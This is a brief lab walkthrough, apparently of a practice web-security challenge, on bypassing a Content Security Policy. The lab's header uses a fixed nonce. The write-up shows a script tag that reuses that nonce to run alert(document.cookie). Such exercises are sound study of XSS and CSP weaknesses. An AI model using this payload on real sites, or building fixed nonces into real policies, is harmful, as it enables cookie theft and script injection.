### Objective

Bypass Content Security Policy (CSP) and execute JavaScript in the page.

Let's check out headers are present now in the source.
```html
`$headerCSP = "Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=';";`
`# <script nonce="TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=">alert(1)</script>`
```
Looks like it's using nonce? Let's check out what nonce is in javascript. From what I read from MDN and other sources, nonce is like a whitelist to execute our javascript.
Let's try it out
```html
<script nonce="TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=">alert(document.cookie)</script>
```
And it works since we have the nonce value.
